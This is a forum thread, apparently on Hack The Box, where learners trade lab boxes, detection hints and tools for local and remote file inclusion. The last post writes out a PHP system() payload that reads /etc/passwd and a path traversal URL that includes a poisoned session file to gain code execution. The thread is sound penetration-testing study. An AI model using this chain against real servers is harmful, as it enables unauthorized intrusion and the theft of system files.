LFI / RFI boxes

Hey there,

Can anyone list some boxes that are good for finding / exploiting LFI and RFI?

Being able to recognize these in web apps is my weak point.

Also, any pointers on how to notice when an LFI vulnerability could be present?

Cheers

Comments

  • I am currently writing a program that can do that and I would have no problem explaining a little bit I have learned about what to look for how to detect and what basic tests my code will do I am also putting a short timeline on this code I should have ready in a week or so for people to try out so if You want to chat just hit me up i am up late working on these and all my friends are sleeping ;)

  • when you have ?page= ?language=
    you could also Kadimus
    https://github.com/P0cL4bs/Kadimus
    but dont trust too much Kadimus

    peek

  • Thanks wabafet - cant wait to try it out
    peek -thanks for the 2 points. Also, trying kadimus now. After playing more with the pwk coursework example i have a better grasp.

    Thanks again

  • Just saw this thread and in case anyone find it useful, a few months ago I created a small tool to make the process of finding and exploiting file inclusion and directory traversal vulnerabilities a bit easier. It's still under development and you can find it here:
    https://github.com/chrispetrou/FDsploit

    game0ver

  • thanks, I will test it

    peek

  • Thanks game0ver, i will give this a spin!
    On a side note, just recieved the email i passed my oscp exam today!

    Cheers and thanks to everyone on HTB!

  • Congrats @mxz3n !
    Thanks guys for trying out my tool. It's still under development so feedback is much appreciated!

    game0ver

  • LFI: Lacasadepapel
    RFI: Help

    death

  • I will admit that is pretty cool game0ver

  • edited April 18

    Ok, I have a question here
    say we know that from a method we can inject code into the session variable which I have learned that by default php5 does this

    var/lib/php5/sess_infoforsession -> the actual session file that is stored server side

    my question here is say I do this

    <?php system("cat /etc/passwd");?>

    http://url.com/index.php?id=5&tool=bag&lang=en_us.php

    that ends up in the session file than i Want to do this once I verify the lfi

    http://url.com/index.php?id=5&tool=bag&lang=/../../../../../../../../../var/lib/php5/sess_sessioninfo

    I will include the session file that is stored on the server and because it is valid php will execute and give me back the info I need from the /etc/pass file

    But what I want to know is how does this happen is it because the lang parameter is doing an include and when it finds php file we included only the actual code in the file that is php will execute allowing for us to get RCE?

    otherwise how does all the other stuff in the session file not break it?

    From my limited knowledge it seems to me that if we have a valid include and the programmer leaves and LFI up for grabs but we cant seem to get RCE , We can resort if it is php5 to see if we can store the info inside of the session file server side like with apache log injection?

Sign In to comment.